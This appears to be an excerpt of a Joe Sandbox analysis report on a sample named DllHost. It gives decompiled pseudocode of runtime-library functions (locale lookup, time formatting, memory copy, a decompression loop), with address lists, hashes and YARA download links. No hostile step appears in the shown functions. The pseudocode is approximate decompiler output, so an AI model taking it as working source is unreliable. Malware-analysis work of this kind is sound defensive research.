				r14d = r14d - 1;
				if (_t225 >= 0) goto 0x191de9a2;
				_t185 = _t304 + 1;
				if (_t185 -  *__rcx >= 0) goto 0x191deb5c;
				asm("o16 nop [eax+eax]");
				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t239) * _t248 * _t296 - _t270) * _t297 * 4)) = 0;
				if (_t185 + 1 -  *__rcx < 0) goto 0x191deb50;
				 *__rcx = _t185;
				if (_t185 == 0) goto 0x191deb70;
				_t186 = _t185 - 1;
				if ( *((intOrPtr*)(__rcx + 4 + _t272 * 4)) != 0) goto 0x191deb70;
				 *__rcx = _t186;
				if (_t186 != 0) goto 0x191deb62;
				goto 0x191deb77;
				return 0;
			}
















































                                                                                                                                                              0x7ff7191de760
                                                                                                                                                              0x7ff7191de776
                                                                                                                                                              0x7ff7191de782
                                                                                                                                                              0x7ff7191de788
                                                                                                                                                              0x7ff7191de78c
                                                                                                                                                              0x7ff7191de792
                                                                                                                                                              0x7ff7191de79a
                                                                                                                                                              0x7ff7191de7a0
                                                                                                                                                              0x7ff7191de7aa
                                                                                                                                                              0x7ff7191de7b4
                                                                                                                                                              0x7ff7191de7b8
                                                                                                                                                              0x7ff7191de7ba
                                                                                                                                                              0x7ff7191de7bd
                                                                                                                                                              0x7ff7191de7c6
                                                                                                                                                              0x7ff7191de7cd
                                                                                                                                                              0x7ff7191de7d5
                                                                                                                                                              0x7ff7191de7df
                                                                                                                                                              0x7ff7191de7e1
                                                                                                                                                              0x7ff7191de7e8
                                                                                                                                                              0x7ff7191de7f1
                                                                                                                                                              0x7ff7191de7fa
                                                                                                                                                              0x7ff7191de7ff
                                                                                                                                                              0x7ff7191de802
                                                                                                                                                              0x7ff7191de806
                                                                                                                                                              0x7ff7191de808
                                                                                                                                                              0x7ff7191de80d
                                                                                                                                                              0x7ff7191de81c
                                                                                                                                                              0x7ff7191de82c
                                                                                                                                                              0x7ff7191de83e
                                                                                                                                                              0x7ff7191de844
                                                                                                                                                              0x7ff7191de846
                                                                                                                                                              0x7ff7191de849
                                                                                                                                                              0x7ff7191de84d
                                                                                                                                                              0x7ff7191de852
                                                                                                                                                              0x7ff7191de85d
                                                                                                                                                              0x7ff7191de865
                                                                                                                                                              0x7ff7191de872
                                                                                                                                                              0x7ff7191de875
                                                                                                                                                              0x7ff7191de87b
                                                                                                                                                              0x7ff7191de87d
                                                                                                                                                              0x7ff7191de885
                                                                                                                                                              0x7ff7191de88b
                                                                                                                                                              0x7ff7191de88e
                                                                                                                                                              0x7ff7191de891
                                                                                                                                                              0x7ff7191de894
                                                                                                                                                              0x7ff7191de897
                                                                                                                                                              0x7ff7191de89d
                                                                                                                                                              0x7ff7191de8b1
                                                                                                                                                              0x7ff7191de8b4
                                                                                                                                                              0x7ff7191de8be
                                                                                                                                                              0x7ff7191de8c0
                                                                                                                                                              0x7ff7191de8cd
                                                                                                                                                              0x7ff7191de8cf
                                                                                                                                                              0x7ff7191de8d7
                                                                                                                                                              0x7ff7191de8da
                                                                                                                                                              0x7ff7191de8e6
                                                                                                                                                              0x7ff7191de8e8
                                                                                                                                                              0x7ff7191de8eb
                                                                                                                                                              0x7ff7191de8ee
                                                                                                                                                              0x7ff7191de8fc
                                                                                                                                                              0x7ff7191de904
                                                                                                                                                              0x7ff7191de909
                                                                                                                                                              0x7ff7191de90d
                                                                                                                                                              0x7ff7191de914
                                                                                                                                                              0x7ff7191de916
                                                                                                                                                              0x7ff7191de91c
                                                                                                                                                              0x7ff7191de91f
                                                                                                                                                              0x7ff7191de921
                                                                                                                                                              0x7ff7191de927
                                                                                                                                                              0x7ff7191de92f
                                                                                                                                                              0x7ff7191de936
                                                                                                                                                              0x7ff7191de941
                                                                                                                                                              0x7ff7191de946
                                                                                                                                                              0x7ff7191de949
                                                                                                                                                              0x7ff7191de94b
                                                                                                                                                              0x7ff7191de94e
                                                                                                                                                              0x7ff7191de958
                                                                                                                                                              0x7ff7191de968
                                                                                                                                                              0x7ff7191de971
                                                                                                                                                              0x7ff7191de975
                                                                                                                                                              0x7ff7191de97b
                                                                                                                                                              0x7ff7191de983
                                                                                                                                                              0x7ff7191de98c
                                                                                                                                                              0x7ff7191de994
                                                                                                                                                              0x7ff7191de998
                                                                                                                                                              0x7ff7191de99d
                                                                                                                                                              0x7ff7191de9a5
                                                                                                                                                              0x7ff7191de9ac
                                                                                                                                                              0x7ff7191de9b4
                                                                                                                                                              0x7ff7191de9c3
                                                                                                                                                              0x7ff7191de9c8
                                                                                                                                                              0x7ff7191de9cd
                                                                                                                                                              0x7ff7191de9d1
                                                                                                                                                              0x7ff7191de9da
                                                                                                                                                              0x7ff7191de9e1
                                                                                                                                                              0x7ff7191de9ec
                                                                                                                                                              0x7ff7191de9f4
                                                                                                                                                              0x7ff7191de9fb
                                                                                                                                                              0x7ff7191dea09
                                                                                                                                                              0x7ff7191dea0b
                                                                                                                                                              0x7ff7191dea0e
                                                                                                                                                              0x7ff7191dea10
                                                                                                                                                              0x7ff7191dea17
                                                                                                                                                              0x7ff7191dea1d
                                                                                                                                                              0x7ff7191dea26
                                                                                                                                                              0x7ff7191dea35
                                                                                                                                                              0x7ff7191dea3c
                                                                                                                                                              0x7ff7191dea42
                                                                                                                                                              0x7ff7191dea58
                                                                                                                                                              0x7ff7191dea5e
                                                                                                                                                              0x7ff7191dea60
                                                                                                                                                              0x7ff7191dea6c
                                                                                                                                                              0x7ff7191dea71
                                                                                                                                                              0x7ff7191dea7a
                                                                                                                                                              0x7ff7191dea7f
                                                                                                                                                              0x7ff7191deaa1
                                                                                                                                                              0x7ff7191deab7
                                                                                                                                                              0x7ff7191deabe
                                                                                                                                                              0x7ff7191deac1
                                                                                                                                                              0x7ff7191deac8
                                                                                                                                                              0x7ff7191dead9
                                                                                                                                                              0x7ff7191deadb
                                                                                                                                                              0x7ff7191deae0
                                                                                                                                                              0x7ff7191deaf5
                                                                                                                                                              0x7ff7191deafc
                                                                                                                                                              0x7ff7191deb0d
                                                                                                                                                              0x7ff7191deb15
                                                                                                                                                              0x7ff7191deb18
                                                                                                                                                              0x7ff7191deb1d
                                                                                                                                                              0x7ff7191deb25
                                                                                                                                                              0x7ff7191deb2e
                                                                                                                                                              0x7ff7191deb32
                                                                                                                                                              0x7ff7191deb40
                                                                                                                                                              0x7ff7191deb48
                                                                                                                                                              0x7ff7191deb4a
                                                                                                                                                              0x7ff7191deb54
                                                                                                                                                              0x7ff7191deb5a
                                                                                                                                                              0x7ff7191deb5c
                                                                                                                                                              0x7ff7191deb60
                                                                                                                                                              0x7ff7191deb62
                                                                                                                                                              0x7ff7191deb68
                                                                                                                                                              0x7ff7191deb6a
                                                                                                                                                              0x7ff7191deb6e
                                                                                                                                                              0x7ff7191deb73
                                                                                                                                                              0x7ff7191deb88

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 1502251526-2286445522
                                                                                                                                                              • Opcode ID: a66b73a30f204b4f592894b5c0decf1d575aeff940a7047c43cb6fc793e2b6f4
                                                                                                                                                              • Instruction ID: 1ac8cd767f364269a4eb81a6e80938e61c5d683e91c7b388bcf68b89ca295951
                                                                                                                                                              • Opcode Fuzzy Hash: a66b73a30f204b4f592894b5c0decf1d575aeff940a7047c43cb6fc793e2b6f4
                                                                                                                                                              • Instruction Fuzzy Hash: 05C10472B18A8687FB24DF19B088669F7E1F784799F848134DB4A43744DA3CF886DB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DE204 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 208COMMONLIBRARYCODECrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E00007FF77FF7191DE204(long long __rbx, intOrPtr* __rcx, long long __rsi, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				long long _v72;
				void* _t11;
				intOrPtr* _t25;
				void* _t32;

				_a24 = __rbx;
				_a32 = __rsi;
				_t25 =  *((intOrPtr*)(__rcx));
				r14d =  *_t25;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 8)))) != 0) goto 0x191de244;
				E00007FF77FF7191E3764(r14d, _t25, _t32);
				goto 0x191de2ec;
				_v72 = 0x7fffffff;
				r8d = 0;
				_t11 = E00007FF77FF7191EC1C8();
				if (_t11 == 0x16) goto 0x191de476;
				if (_t11 == 0x22) goto 0x191de476;
				E00007FF77FF7191E7598(_t11, _a16, _t32);
				if (_t25 != 0) goto 0x191de2a6;
				E00007FF77FF7191E6B28(_t25, _a16);
				return 0;
			}








                                                                                                                                                              0x7ff7191de204
                                                                                                                                                              0x7ff7191de209
                                                                                                                                                              0x7ff7191de229
                                                                                                                                                              0x7ff7191de22c
                                                                                                                                                              0x7ff7191de232
                                                                                                                                                              0x7ff7191de237
                                                                                                                                                              0x7ff7191de23f
                                                                                                                                                              0x7ff7191de247
                                                                                                                                                              0x7ff7191de250
                                                                                                                                                              0x7ff7191de257
                                                                                                                                                              0x7ff7191de25f
                                                                                                                                                              0x7ff7191de268
                                                                                                                                                              0x7ff7191de277
                                                                                                                                                              0x7ff7191de284
                                                                                                                                                              0x7ff7191de286
                                                                                                                                                              0x7ff7191de2a5

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 4239037671-2286445522
                                                                                                                                                              • Opcode ID: 1a39414b815c93a1f073e71fb9693831ae882eb5726b83c62f11ff2b9dfc3521
                                                                                                                                                              • Instruction ID: b94940346788cdb13731b9f42aefc0bb433844e14e0525d81a3e150ff7def234
                                                                                                                                                              • Opcode Fuzzy Hash: 1a39414b815c93a1f073e71fb9693831ae882eb5726b83c62f11ff2b9dfc3521
                                                                                                                                                              • Instruction Fuzzy Hash: 4681B232A04E5182FB61AE65E48537963B0FB44BB8F844636EE1D97784CF38D08A9350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 29%
                                                                                                                                                              			E00007FF77FF7191E7BB8(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				void* _t11;
				void* _t22;
				void* _t32;

				_t23 = __rbx;
				_t22 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t11 = r9d;
				_t32 = __rcx;
				E00007FF77FF7191E76B4(0xb, __rbx, "GetLocaleInfoEx", __rsi, 0x19207dc8, "GetLocaleInfoEx");
				if (_t22 == 0) goto 0x191e7c0e;
				r9d = _t11;
				 *0x191f94c0();
				goto 0x191e7c25;
				E00007FF77FF7191E7EA8(0, 0, _t22, _t23, _t32);
				r9d = _t11;
				return GetLocaleInfoW(??, ??, ??, ??);
			}






                                                                                                                                                              0x7ff7191e7bb8
                                                                                                                                                              0x7ff7191e7bb8
                                                                                                                                                              0x7ff7191e7bb8
                                                                                                                                                              0x7ff7191e7bbd
                                                                                                                                                              0x7ff7191e7bc2
                                                                                                                                                              0x7ff7191e7bcc
                                                                                                                                                              0x7ff7191e7bdb
                                                                                                                                                              0x7ff7191e7bf1
                                                                                                                                                              0x7ff7191e7bfc
                                                                                                                                                              0x7ff7191e7bfe
                                                                                                                                                              0x7ff7191e7c06
                                                                                                                                                              0x7ff7191e7c0c
                                                                                                                                                              0x7ff7191e7c10
                                                                                                                                                              0x7ff7191e7c17
                                                                                                                                                              0x7ff7191e7c39

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocaletry_get_function
                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                              • API String ID: 2200034068-2904428671
                                                                                                                                                              • Opcode ID: c3d2d2281e7a5844e2be236c03ab4ab0afdc762f09fbde5c79f185710fb1d0a7
                                                                                                                                                              • Instruction ID: 563f60c81fb6b87254b0ccae87a73dc12c78847bb7db0090116976785fbbdfce
                                                                                                                                                              • Opcode Fuzzy Hash: c3d2d2281e7a5844e2be236c03ab4ab0afdc762f09fbde5c79f185710fb1d0a7
                                                                                                                                                              • Instruction Fuzzy Hash: AB018F21B08E8282F701BF11B8004AAE775AF95BE8F984035DA0D13755CF3CD94A9750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F143C Relevance: 4.7, APIs: 3, Instructions: 169COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                              			E00007FF77FF7191F143C(void* __ecx, void* __edx, void* __ebp, long long __rbx, void* __rcx, void* __rdx) {
				void* __rsi;
				signed int _t47;
				int _t48;
				void* _t49;
				void* _t55;
				signed int _t63;
				signed int _t72;
				signed int _t81;
				signed long long _t123;
				signed long long _t124;
				void* _t130;
				void* _t149;
				signed int* _t150;
				int _t152;
				intOrPtr* _t153;
				signed long long _t155;
				signed long long _t156;
				void* _t159;
				signed long long _t160;
				void* _t168;

				_t143 = __rdx;
				 *((long long*)(_t159 + 0x10)) = __rbx;
				 *(_t159 + 0x18) = _t155;
				_t160 = _t159 - 0x120;
				_t123 =  *0x192190a0; // 0x590452ce5669
				_t124 = _t123 ^ _t160;
				 *(_t160 + 0x110) = _t124;
				_t130 = __rcx;
				E00007FF77FF7191E5AC4(_t124, __rcx, __rdx, _t152, _t168);
				_t4 = _t124 + 0x98; // 0x98
				_t153 = _t4;
				E00007FF77FF7191E5AC4(_t124, _t130, _t143, _t153, _t149);
				_t150 =  *((intOrPtr*)(_t124 + 0x3a0));
				_t47 = E00007FF77FF7191F1790(_t130, _t143);
				r9d = 0x78;
				_t72 = _t47;
				asm("sbb edx, edx");
				_t48 = GetLocaleInfoW(_t152, ??, ??);
				r14d = 0;
				if (_t48 == 0) goto 0x191f1656;
				_t49 = E00007FF77FF7191D87A4(_t124,  *((intOrPtr*)(_t153 + 8)));
				_t156 = _t155 | 0xffffffff;
				if (_t49 != 0) goto 0x191f158b;
				_t11 = _t168 + 0x78; // 0x78
				r9d = _t11;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x191f1656;
				if (E00007FF77FF7191D87A4(_t124,  *_t153) != 0) goto 0x191f151d;
				_t150[1] = _t72;
				goto 0x191f1586;
				if ((( *_t150 | 0x00000304) & 0x00000002) != 0) goto 0x191f158b;
				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x191f1565;
				_t55 = E00007FF77FF7191F3560(_t124,  *_t153,  *((intOrPtr*)(_t153 + 0x14)));
				if (_t55 != 0) goto 0x191f1563;
				_t81 =  *_t150 | 0x00000002;
				_t150[2] = _t72;
				 *_t150 = _t81;
				if ( *((intOrPtr*)( *_t153 + (_t156 + 1) * 2)) != r14w) goto 0x191f154f;
				if (_t55 !=  *((intOrPtr*)(_t153 + 0x14))) goto 0x191f158b;
				_t150[1] = _t72;
				goto 0x191f158b;
				if ((_t81 & 0x00000001) != 0) goto 0x191f158b;
				if (_t72 ==  *0x1920b0a8) goto 0x191f158b;
				if (r14d + 1 - 0xa < 0) goto 0x191f1573;
				_t150[2] = _t72;
				 *_t150 = _t81 | 0x00000001;
				if (( *_t150 & 0x00000300) == 0x300) goto 0x191f164a;
				r9d = 0x78;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x191f1656;
				if (E00007FF77FF7191D87A4(0x7ff71920b0aa,  *_t153) != 0) goto 0x191f1610;
				_t63 =  *_t150;
				asm("bts eax, 0x9");
				 *_t150 = _t63;
				if ( *((intOrPtr*)(_t153 + 0x18)) == r14d) goto 0x191f15f1;
				asm("bts eax, 0x8");
				 *_t150 = _t63;
				goto 0x191f1641;
				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x191f15e9;
				if ( *((intOrPtr*)( *_t153 + (_t156 + 1) * 2)) != r14w) goto 0x191f15fa;
				if (__ebp !=  *((intOrPtr*)(_t153 + 0x14))) goto 0x191f15e9;
				goto 0x191f162f;
				if ( *((intOrPtr*)(_t153 + 0x18)) != r14d) goto 0x191f164a;
				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x191f164a;
				if (E00007FF77FF7191D87A4(0x7ff71920b0aa,  *_t153) != 0) goto 0x191f164a;
				if (E00007FF77FF7191F1890(_t72, 0, 0x7ff71920b0aa, _t130,  *_t153, _t160 + 0x20, _t153) == 0) goto 0x191f164a;
				asm("bts dword [edi], 0x8");
				if (_t150[1] != r14d) goto 0x191f164a;
				_t150[1] = _t72;
				goto 0x191f165e;
				 *_t150 = r14d;
				return E00007FF77FF7191D23B0(1, _t72,  *(_t160 + 0x110) ^ _t160);
			}























                                                                                                                                                              0x7ff7191f143c
                                                                                                                                                              0x7ff7191f143c
                                                                                                                                                              0x7ff7191f1441
                                                                                                                                                              0x7ff7191f144a
                                                                                                                                                              0x7ff7191f1451
                                                                                                                                                              0x7ff7191f1458
                                                                                                                                                              0x7ff7191f145b
                                                                                                                                                              0x7ff7191f1463
                                                                                                                                                              0x7ff7191f1466
                                                                                                                                                              0x7ff7191f146b
                                                                                                                                                              0x7ff7191f146b
                                                                                                                                                              0x7ff7191f1472
                                                                                                                                                              0x7ff7191f147a
                                                                                                                                                              0x7ff7191f1481
                                                                                                                                                              0x7ff7191f1490
                                                                                                                                                              0x7ff7191f1498
                                                                                                                                                              0x7ff7191f149a
                                                                                                                                                              0x7ff7191f14a8
                                                                                                                                                              0x7ff7191f14ae
                                                                                                                                                              0x7ff7191f14b3
                                                                                                                                                              0x7ff7191f14c2
                                                                                                                                                              0x7ff7191f14c7
                                                                                                                                                              0x7ff7191f14cd
                                                                                                                                                              0x7ff7191f14d6
                                                                                                                                                              0x7ff7191f14d6
                                                                                                                                                              0x7ff7191f14e3
                                                                                                                                                              0x7ff7191f14f9
                                                                                                                                                              0x7ff7191f1510
                                                                                                                                                              0x7ff7191f1518
                                                                                                                                                              0x7ff7191f151b
                                                                                                                                                              0x7ff7191f1520
                                                                                                                                                              0x7ff7191f1528
                                                                                                                                                              0x7ff7191f1536
                                                                                                                                                              0x7ff7191f153f
                                                                                                                                                              0x7ff7191f1541
                                                                                                                                                              0x7ff7191f1544
                                                                                                                                                              0x7ff7191f1547
                                                                                                                                                              0x7ff7191f1557
                                                                                                                                                              0x7ff7191f155c
                                                                                                                                                              0x7ff7191f155e
                                                                                                                                                              0x7ff7191f1561
                                                                                                                                                              0x7ff7191f1567
                                                                                                                                                              0x7ff7191f1576
                                                                                                                                                              0x7ff7191f1581
                                                                                                                                                              0x7ff7191f1586
                                                                                                                                                              0x7ff7191f1589
                                                                                                                                                              0x7ff7191f1596
                                                                                                                                                              0x7ff7191f15a6
                                                                                                                                                              0x7ff7191f15ae
                                                                                                                                                              0x7ff7191f15c4
                                                                                                                                                              0x7ff7191f15d9
                                                                                                                                                              0x7ff7191f15db
                                                                                                                                                              0x7ff7191f15dd
                                                                                                                                                              0x7ff7191f15e1
                                                                                                                                                              0x7ff7191f15e7
                                                                                                                                                              0x7ff7191f15e9
                                                                                                                                                              0x7ff7191f15ed
                                                                                                                                                              0x7ff7191f15ef
                                                                                                                                                              0x7ff7191f15f5
                                                                                                                                                              0x7ff7191f1602
                                                                                                                                                              0x7ff7191f1607
                                                                                                                                                              0x7ff7191f160e
                                                                                                                                                              0x7ff7191f1614
                                                                                                                                                              0x7ff7191f161a
                                                                                                                                                              0x7ff7191f162b
                                                                                                                                                              0x7ff7191f163b
                                                                                                                                                              0x7ff7191f163d
                                                                                                                                                              0x7ff7191f1645
                                                                                                                                                              0x7ff7191f1647
                                                                                                                                                              0x7ff7191f1654
                                                                                                                                                              0x7ff7191f1656
                                                                                                                                                              0x7ff7191f1685

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: GetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5AD3
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: SetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5B71
                                                                                                                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF7191F14A8
                                                                                                                                                                • Part of subcall function 00007FF7191D87A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7191D87C4
                                                                                                                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF7191F14F1
                                                                                                                                                                • Part of subcall function 00007FF7191D87A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7191D8879
                                                                                                                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF7191F15BC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3644580040-0
                                                                                                                                                              • Opcode ID: 42ee42a6d07938c5779a42904f445764e99699e9131e02f8c33204754ccf5dff
                                                                                                                                                              • Instruction ID: acfb649eda2e484d4682d59e8dfef8f0e52089401fc89fbceabc47705ca0f95d
                                                                                                                                                              • Opcode Fuzzy Hash: 42ee42a6d07938c5779a42904f445764e99699e9131e02f8c33204754ccf5dff
                                                                                                                                                              • Instruction Fuzzy Hash: D961AF32A08D468AFB34AF11F540179A3B5FB86768F848135CB5E83690EE3CE49ED710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D00C0 Relevance: 4.1, Strings: 3, Instructions: 384COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00007FF77FF7191D00C0(void* __edx, void* __esi, void* __rax, signed int __rcx, void* __r10, void* __r11, void* _a8, unsigned int _a16, intOrPtr _a24, intOrPtr _a32) {
				signed long long _v88;
				signed long long _v96;
				long long _v104;
				long long _v112;
				unsigned int _t114;
				signed char _t116;
				signed char _t129;
				signed char _t131;
				signed int _t142;
				signed int _t159;
				intOrPtr _t161;
				unsigned int _t167;
				unsigned int _t174;
				signed char _t184;
				signed char _t188;
				signed char _t190;
				signed char _t196;
				signed char _t200;
				signed char _t203;
				void* _t210;
				signed char _t222;
				signed char _t229;
				signed char _t230;
				signed int _t236;
				signed char _t237;
				signed char _t258;
				void* _t270;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				signed long long _t286;
				long long _t289;
				signed long long _t292;
				signed char* _t297;
				signed long long _t298;
				signed long long _t300;
				long long* _t304;
				void* _t305;
				signed char* _t311;
				signed char* _t312;
				signed char* _t313;
				signed char* _t314;
				signed char* _t315;
				signed char* _t316;
				void* _t319;
				signed int* _t320;
				char* _t322;
				char* _t323;
				char* _t324;
				signed int* _t325;
				signed int* _t326;
				signed int* _t327;
				signed int* _t328;
				signed int* _t329;
				signed int* _t330;
				signed int* _t331;
				signed int* _t332;
				signed int* _t333;
				long long _t334;
				signed char* _t335;
				signed char* _t339;
				signed char* _t344;
				signed char* _t345;
				intOrPtr _t350;
				intOrPtr _t351;
				signed char* _t352;

				_a8 = __rcx;
				_t320 = _t319 - 0x38;
				_t351 =  *((intOrPtr*)(__rcx + 0x28));
				_t322 =  *((intOrPtr*)(__rcx + 0x10));
				_t311 =  *__rcx;
				_t286 = __rax + _t311;
				_t334 =  *((intOrPtr*)(_t351 + 0x68));
				r14d =  *((intOrPtr*)(_t351 + 0x3c));
				_t352 =  *((intOrPtr*)(_t351 + 0x40));
				r11d =  *(_t351 + 0x4c);
				_t350 =  *((intOrPtr*)(_t351 + 0x60));
				_v96 = _t286;
				_t300 = _t322 - _t286;
				_v104 = _t305 + _t322;
				_a16 =  *((intOrPtr*)(_t351 + 0x34));
				_v88 = _t300;
				_a32 =  *((intOrPtr*)(_t351 + 0x38));
				_v112 = _t334;
				_a24 = (1 <<  *(_t351 + 0x74)) - 1;
				 *_t320 = 1;
				if (r11d - 0xf >= 0) goto 0x191d0188;
				_t312 =  &(_t311[2]);
				r11d = r11d + 0x10;
				_t292 = __rcx & _t286;
				_t114 =  *(_t350 + _t292 * 4);
				_t184 = _t114 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t184;
				_t222 = _t114 & 0x000000ff;
				if (_t114 == 0) goto 0x191d01ec;
				r10d = _t114;
				r10d = r10d >> 0x10;
				if ((_t222 & 0x00000010) != 0) goto 0x191d01fa;
				if ((_t222 & 0x00000040) != 0) goto 0x191d04df;
				_t116 =  *(_t350 + _t300 * 4);
				r10d = _t116;
				_t188 = _t116 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t188;
				r10d = r10d >> 0x10;
				_t258 = _t116;
				if (_t258 != 0) goto 0x191d01b0;
				 *_t322 = _t116 >> 0x10;
				_t323 = _t322 + 1;
				goto 0x191d04cb;
				_t229 = _t116 & 0xf;
				if (_t258 == 0) goto 0x191d0227;
				if (r11d - _t229 >= 0) goto 0x191d0215;
				_t313 =  &(_t312[1]);
				_t167 = ( *(_t351 + 0x48) + (( *_t311 & 0x000000ff) << r11d) + ((_t311[1] & 0x000000ff) << __r11 + 8) >> _t184 >> _t188) + (( *_t312 & 0x000000ff) << r11d);
				r11d = r11d + 8;
				_t190 = _t229;
				r10d = r10d + ((0x00000001 << _t190) - 0x00000001 & _t167);
				r11d = r11d - _t229;
				if (r11d - 0xf >= 0) goto 0x191d024b;
				_t314 =  &(_t313[2]);
				r11d = r11d + 0x10;
				_t129 =  *(_t334 + (_t292 & _t286) * 4);
				r9d = _t129;
				_t196 = _t129 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t196;
				_t230 = _t129 & 0x000000ff;
				r9d = r9d >> 0x10;
				if ((_t230 & 0x00000010) != 0) goto 0x191d02b3;
				if ((_t230 & 0x00000040) != 0) goto 0x191d050b;
				_t131 =  *(_v112 + _t300 * 4);
				r9d = _t131;
				_t200 = _t131 >> 0x00000008 & 0x000000ff;
